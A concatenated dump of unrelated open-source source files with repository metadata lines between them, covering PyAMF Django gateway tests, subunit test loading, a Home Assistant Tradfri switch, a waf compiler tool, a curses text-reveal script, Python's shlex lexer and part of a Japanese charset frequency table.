request.write('Bad request') request.seek(0, 0) http_request = http.HttpRequest() http_request.method = 'POST' http_request.raw_post_data = request.getvalue() http_response = gw(http_request) self.assertEqual(http_response.status_code, 400) def test_unknown_request(self): gw = django.DjangoGateway() request = util.BufferedByteStream() request.write('\x00\x00\x00\x00\x00\x01\x00\x09test.test\x00' '\x02/1\x00\x00\x00\x14\x0a\x00\x00\x00\x01\x08\x00\x00\x00\x00' '\x00\x01\x61\x02\x00\x01\x61\x00\x00\x09') request.seek(0, 0) http_request = http.HttpRequest() http_request.method = 'POST' http_request.raw_post_data = request.getvalue() http_response = gw(http_request) envelope = remoting.decode(http_response.content) message = envelope['/1'] self.assertEqual(message.status, remoting.STATUS_ERROR) body = message.body self.assertTrue(isinstance(body, remoting.ErrorFault)) self.assertEqual(body.code, 'Service.ResourceNotFound') def test_expose_request(self): http_request = http.HttpRequest() self.executed = False def test(request): self.assertEqual(http_request, request) self.assertTrue(hasattr(request, 'amf_request')) self.executed = True gw = django.DjangoGateway({'test.test': test}, expose_request=True) request = util.BufferedByteStream() request.write('\x00\x00\x00\x00\x00\x01\x00\x09test.test\x00' '\x02/1\x00\x00\x00\x05\x0a\x00\x00\x00\x00') request.seek(0, 0) http_request.method = 'POST' http_request.raw_post_data = request.getvalue() gw(http_request) self.assertTrue(self.executed) def _raiseException(self, e, *args, **kwargs): raise e() def test_really_bad_decode(self): self.old_method = remoting.decode remoting.decode = lambda *args, **kwargs: self._raiseException(Exception, *args, **kwargs) http_request = http.HttpRequest() http_request.method = 'POST' http_request.raw_post_data = '' gw = django.DjangoGateway() try: http_response = gw(http_request) except: remoting.decode = self.old_method raise remoting.decode = self.old_method self.assertTrue(isinstance(http_response, http.HttpResponseServerError)) self.assertEqual(http_response.status_code, 500) self.assertEqual(http_response.content, '500 Internal Server Error\n\nAn unexpected error occurred.') def test_expected_exceptions_decode(self): self.old_method = remoting.decode gw = django.DjangoGateway() http_request = http.HttpRequest() http_request.method = 'POST' http_request.raw_post_data = '' try: for x in (KeyboardInterrupt, SystemExit): remoting.decode = lambda *args, **kwargs: self._raiseException(x, *args, **kwargs) self.assertRaises(x, gw, http_request) except: remoting.decode = self.old_method raise remoting.decode = self.old_method def test_timezone(self): import datetime http_request = http.HttpRequest() self.executed = False td = datetime.timedelta(hours=-5) now = datetime.datetime.utcnow() def echo(d): self.assertEqual(d, now + td) self.executed = True return d gw = django.DjangoGateway({'test.test': echo}, timezone_offset=-18000, expose_request=False) msg = remoting.Envelope(amfVersion=pyamf.AMF0) msg['/1'] = remoting.Request(target='test.test', body=[now]) http_request.method = 'POST' http_request.raw_post_data = remoting.encode(msg).getvalue() res = remoting.decode(gw(http_request).content) self.assertTrue(self.executed) self.assertEqual(res['/1'].body, now)
gpl-2.0
devs1991/test_edx_docmode
venv/lib/python2.7/site-packages/subunit/tests/__init__.py
2
2599
# # subunit: extensions to python unittest to get test results from subprocesses. # Copyright (C) 2005 Robert Collins <robertc@robertcollins.net> # # Licensed under either the Apache License, Version 2.0 or the BSD 3-clause # license at the users choice. A copy of both licenses are available in the # project source as Apache-2.0 and BSD. You may not use this file except in # compliance with one of these two licences. # # Unless required by applicable law or agreed to in writing, software # distributed under these licenses is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # license you chose for the specific language governing permissions and # limitations under that license. # import sys from unittest import TestLoader # Before the test module imports to avoid circularity. # For testing: different pythons have different str() implementations. if sys.version_info > (3, 0): _remote_exception_repr = "testtools.testresult.real._StringException" _remote_exception_str = "Traceback (most recent call last):\ntesttools.testresult.real._StringException" _remote_exception_str_chunked = "57\r\n" + _remote_exception_str + ": boo qux\n0\r\n" else: _remote_exception_repr = "_StringException" _remote_exception_str = "Traceback (most recent call last):\n_StringException" _remote_exception_str_chunked = "3D\r\n" + _remote_exception_str + ": boo qux\n0\r\n" from subunit.tests import ( test_chunked, test_details, test_filters, test_progress_model, test_run, test_subunit_filter, test_subunit_stats, test_subunit_tags, test_tap2subunit, test_test_protocol, test_test_protocol2, test_test_results, ) def test_suite(): loader = TestLoader() result = loader.loadTestsFromModule(test_chunked) result.addTest(loader.loadTestsFromModule(test_details)) result.addTest(loader.loadTestsFromModule(test_filters)) result.addTest(loader.loadTestsFromModule(test_progress_model)) result.addTest(loader.loadTestsFromModule(test_test_results)) result.addTest(loader.loadTestsFromModule(test_test_protocol)) result.addTest(loader.loadTestsFromModule(test_test_protocol2)) result.addTest(loader.loadTestsFromModule(test_tap2subunit)) result.addTest(loader.loadTestsFromModule(test_subunit_filter)) result.addTest(loader.loadTestsFromModule(test_subunit_tags)) result.addTest(loader.loadTestsFromModule(test_subunit_stats)) result.addTest(loader.loadTestsFromModule(test_run)) return result
agpl-3.0
Teagan42/home-assistant
homeassistant/components/tradfri/switch.py
4
1789
"""Support for IKEA Tradfri switches.""" from homeassistant.components.switch import SwitchDevice from .base_class import TradfriBaseDevice from .const import CONF_GATEWAY_ID, KEY_API, KEY_GATEWAY async def async_setup_entry(hass, config_entry, async_add_entities): """Load Tradfri switches based on a config entry.""" gateway_id = config_entry.data[CONF_GATEWAY_ID] api = hass.data[KEY_API][config_entry.entry_id] gateway = hass.data[KEY_GATEWAY][config_entry.entry_id] devices_commands = await api(gateway.get_devices()) devices = await api(devices_commands) switches = [dev for dev in devices if dev.has_socket_control] if switches: async_add_entities( TradfriSwitch(switch, api, gateway_id) for switch in switches ) class TradfriSwitch(TradfriBaseDevice, SwitchDevice): """The platform class required by Home Assistant.""" def __init__(self, device, api, gateway_id): """Initialize a switch.""" super().__init__(device, api, gateway_id) self._unique_id = f"{gateway_id}-{device.id}" def _refresh(self, device): """Refresh the switch data.""" super()._refresh(device) # Caching of switch control and switch object self._device_control = device.socket_control self._device_data = device.socket_control.sockets[0] @property def is_on(self): """Return true if switch is on.""" return self._device_data.state async def async_turn_off(self, **kwargs): """Instruct the switch to turn off.""" await self._api(self._device_control.set_state(False)) async def async_turn_on(self, **kwargs): """Instruct the switch to turn on.""" await self._api(self._device_control.set_state(True))
apache-2.0
ThomasFeher/audacity
lib-src/lv2/lilv/waflib/Tools/xlc.py
330
1175
#! /usr/bin/env python # encoding: utf-8 # WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file from waflib.Tools import ccroot,ar from waflib.Configure import conf @conf def find_xlc(conf): cc=conf.find_program(['xlc_r','xlc'],var='CC') cc=conf.cmd_to_list(cc) conf.get_xlc_version(cc) conf.env.CC_NAME='xlc' conf.env.CC=cc @conf def xlc_common_flags(conf): v=conf.env v['CC_SRC_F']=[] v['CC_TGT_F']=['-c','-o'] if not v['LINK_CC']:v['LINK_CC']=v['CC'] v['CCLNK_SRC_F']=[] v['CCLNK_TGT_F']=['-o'] v['CPPPATH_ST']='-I%s' v['DEFINES_ST']='-D%s' v['LIB_ST']='-l%s' v['LIBPATH_ST']='-L%s' v['STLIB_ST']='-l%s' v['STLIBPATH_ST']='-L%s' v['RPATH_ST']='-Wl,-rpath,%s' v['SONAME_ST']=[] v['SHLIB_MARKER']=[] v['STLIB_MARKER']=[] v['LINKFLAGS_cprogram']=['-Wl,-brtl'] v['cprogram_PATTERN']='%s' v['CFLAGS_cshlib']=['-fPIC'] v['LINKFLAGS_cshlib']=['-G','-Wl,-brtl,-bexpfull'] v['cshlib_PATTERN']='lib%s.so' v['LINKFLAGS_cstlib']=[] v['cstlib_PATTERN']='lib%s.a' def configure(conf): conf.find_xlc() conf.find_ar() conf.xlc_common_flags() conf.cc_load_tools() conf.cc_add_flags() conf.link_add_flags()
gpl-2.0
jtwaleson/decrypt
decrypt/decrypt.py
1
1745
#!/usr/bin/env python import curses import time import fileinput import random import string screen = curses.initscr() lines = [] chance = 0.1 confirmed_per_line = [] def main(): curses.noecho() try: curses.curs_set(0) except: pass screen.keypad(1) try: for line in fileinput.input(): confirmed_per_line.append([]) lines.append(line.rstrip()) iterate() fileinput.close() while iterate(increase=True): pass time.sleep(2) except KeyboardInterrupt: pass finally: curses.endwin() for line in lines: print(line) def iterate(increase=False): global chance, confirmed_per_line, lines still_random = 0 if increase: chance += 0.01 screen.erase() (y, x) = screen.getmaxyx() final_line = len(lines) if final_line > y: first_line = final_line - y else: first_line = 0 for line_num in range(first_line, final_line): line = lines[line_num] for col in range(min(x, len(line))): try: if col not in confirmed_per_line[line_num]: still_random += 1 if random.random() < chance: confirmed_per_line[line_num].append(col) screen.addch(line_num - first_line, col, random.choice(string.punctuation), curses.A_REVERSE) else: screen.addstr(line_num - first_line, col, line[col]) except: pass screen.refresh() time.sleep(0.1) return still_random > 0
mit
unindented/streamcode
client/static/jsrepl/extern/python/unclosured/lib/python2.7/shlex.py
306
11137
# -*- coding: iso-8859-1 -*- """A lexical analyzer class for simple shell-like syntaxes.""" # Module and documentation by Eric S. Raymond, 21 Dec 1998 # Input stacking and error message cleanup added by ESR, March 2000 # push_source() and pop_source() made explicit by ESR, January 2001. # Posix compliance, split(), string arguments, and # iterator interface by Gustavo Niemeyer, April 2003. import os.path import sys from collections import deque try: from cStringIO import StringIO except ImportError: from StringIO import StringIO __all__ = ["shlex", "split"] class shlex: "A lexical analyzer class for simple shell-like syntaxes." def __init__(self, instream=None, infile=None, posix=False): if isinstance(instream, basestring): instream = StringIO(instream) if instream is not None: self.instream = instream self.infile = infile else: self.instream = sys.stdin self.infile = None self.posix = posix if posix: self.eof = None else: self.eof = '' self.commenters = '#' self.wordchars = ('abcdfeghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_') if self.posix: self.wordchars += ('ßàáâãäåæçèéêëìíîïðñòóôõöøùúûüýþÿ' 'ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖØÙÚÛÜÝÞ') self.whitespace = ' \t\r\n' self.whitespace_split = False self.quotes = '\'"' self.escape = '\\' self.escapedquotes = '"' self.state = ' ' self.pushback = deque() self.lineno = 1 self.debug = 0 self.token = '' self.filestack = deque() self.source = None if self.debug: print 'shlex: reading from %s, line %d' \ % (self.instream, self.lineno) def push_token(self, tok): "Push a token onto the stack popped by the get_token method" if self.debug >= 1: print "shlex: pushing token " + repr(tok) self.pushback.appendleft(tok) def push_source(self, newstream, newfile=None): "Push an input source onto the lexer's input source stack." if isinstance(newstream, basestring): newstream = StringIO(newstream) self.filestack.appendleft((self.infile, self.instream, self.lineno)) self.infile = newfile self.instream = newstream self.lineno = 1 if self.debug: if newfile is not None: print 'shlex: pushing to file %s' % (self.infile,) else: print 'shlex: pushing to stream %s' % (self.instream,) def pop_source(self): "Pop the input source stack." self.instream.close() (self.infile, self.instream, self.lineno) = self.filestack.popleft() if self.debug: print 'shlex: popping to %s, line %d' \ % (self.instream, self.lineno) self.state = ' ' def get_token(self): "Get a token from the input stream (or from stack if it's nonempty)" if self.pushback: tok = self.pushback.popleft() if self.debug >= 1: print "shlex: popping token " + repr(tok) return tok # No pushback. Get a token. raw = self.read_token() # Handle inclusions if self.source is not None: while raw == self.source: spec = self.sourcehook(self.read_token()) if spec: (newfile, newstream) = spec self.push_source(newstream, newfile) raw = self.get_token() # Maybe we got EOF instead? while raw == self.eof: if not self.filestack: return self.eof else: self.pop_source() raw = self.get_token() # Neither inclusion nor EOF if self.debug >= 1: if raw != self.eof: print "shlex: token=" + repr(raw) else: print "shlex: token=EOF" return raw def read_token(self): quoted = False escapedstate = ' ' while True: nextchar = self.instream.read(1) if nextchar == '\n': self.lineno = self.lineno + 1 if self.debug >= 3: print "shlex: in state", repr(self.state), \ "I see character:", repr(nextchar) if self.state is None: self.token = '' # past end of file break elif self.state == ' ': if not nextchar: self.state = None # end of file break elif nextchar in self.whitespace: if self.debug >= 2: print "shlex: I see whitespace in whitespace state" if self.token or (self.posix and quoted): break # emit current token else: continue elif nextchar in self.commenters: self.instream.readline() self.lineno = self.lineno + 1 elif self.posix and nextchar in self.escape: escapedstate = 'a' self.state = nextchar elif nextchar in self.wordchars: self.token = nextchar self.state = 'a' elif nextchar in self.quotes: if not self.posix: self.token = nextchar self.state = nextchar elif self.whitespace_split: self.token = nextchar self.state = 'a' else: self.token = nextchar if self.token or (self.posix and quoted): break # emit current token else: continue elif self.state in self.quotes: quoted = True if not nextchar: # end of file if self.debug >= 2: print "shlex: I see EOF in quotes state" # XXX what error should be raised here? raise ValueError, "No closing quotation" if nextchar == self.state: if not self.posix: self.token = self.token + nextchar self.state = ' ' break else: self.state = 'a' elif self.posix and nextchar in self.escape and \ self.state in self.escapedquotes: escapedstate = self.state self.state = nextchar else: self.token = self.token + nextchar elif self.state in self.escape: if not nextchar: # end of file if self.debug >= 2: print "shlex: I see EOF in escape state" # XXX what error should be raised here? raise ValueError, "No escaped character" # In posix shells, only the quote itself or the escape # character may be escaped within quotes. if escapedstate in self.quotes and \ nextchar != self.state and nextchar != escapedstate: self.token = self.token + self.state self.token = self.token + nextchar self.state = escapedstate elif self.state == 'a': if not nextchar: self.state = None # end of file break elif nextchar in self.whitespace: if self.debug >= 2: print "shlex: I see whitespace in word state" self.state = ' ' if self.token or (self.posix and quoted): break # emit current token else: continue elif nextchar in self.commenters: self.instream.readline() self.lineno = self.lineno + 1 if self.posix: self.state = ' ' if self.token or (self.posix and quoted): break # emit current token else: continue elif self.posix and nextchar in self.quotes: self.state = nextchar elif self.posix and nextchar in self.escape: escapedstate = 'a' self.state = nextchar elif nextchar in self.wordchars or nextchar in self.quotes \ or self.whitespace_split: self.token = self.token + nextchar else: self.pushback.appendleft(nextchar) if self.debug >= 2: print "shlex: I see punctuation in word state" self.state = ' ' if self.token: break # emit current token else: continue result = self.token self.token = '' if self.posix and not quoted and result == '': result = None if self.debug > 1: if result: print "shlex: raw token=" + repr(result) else: print "shlex: raw token=EOF" return result def sourcehook(self, newfile): "Hook called on a filename to be sourced." if newfile[0] == '"': newfile = newfile[1:-1] # This implements cpp-like semantics for relative-path inclusion. if isinstance(self.infile, basestring) and not os.path.isabs(newfile): newfile = os.path.join(os.path.dirname(self.infile), newfile) return (newfile, open(newfile, "r")) def error_leader(self, infile=None, lineno=None): "Emit a C-compiler-like, Emacs-friendly error-message leader." if infile is None: infile = self.infile if lineno is None: lineno = self.lineno return "\"%s\", line %d: " % (infile, lineno) def __iter__(self): return self def next(self): token = self.get_token() if token == self.eof: raise StopIteration return token def split(s, comments=False, posix=True): lex = shlex(s, posix=posix) lex.whitespace_split = True if not comments: lex.commenters = '' return list(lex) if __name__ == '__main__': if len(sys.argv) == 1: lexer = shlex() else: file = sys.argv[1] lexer = shlex(open(file), file) while 1: tt = lexer.get_token() if tt: print "Token: " + repr(tt) else: break
mit
SMALLplayer/smallplayer-image-creator
storage/.xbmc/addons/script.module.requests/lib/requests/packages/charade/jpcntx.py
151
19323
######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. # # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. # # Contributor(s): # Mark Pilgrim - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### from .compat import wrap_ord NUM_OF_CATEGORY = 6 DONT_KNOW = -1 ENOUGH_REL_THRESHOLD = 100 MAX_REL_THRESHOLD = 1000 MINIMUM_DATA_THRESHOLD = 4 # This is hiragana 2-char sequence table, the number in each cell represents its frequency category jp2CharContext = ( (0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1), (2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4), (0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2), (0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), (0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), (0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), (0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4), (1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4), (0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3), (0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3), (0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3), (0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4), (0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3), (2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4), (0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3), (0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5), (0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3), (2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5), (0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4), (1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4), (0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3), (0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3), (0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3), (0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5), (0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4), (0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5), (0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3), (0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4), (0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4), (0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4), (0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1), (0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0), (1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3), (0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0), (0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3), (0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3), (0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5), (0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4), 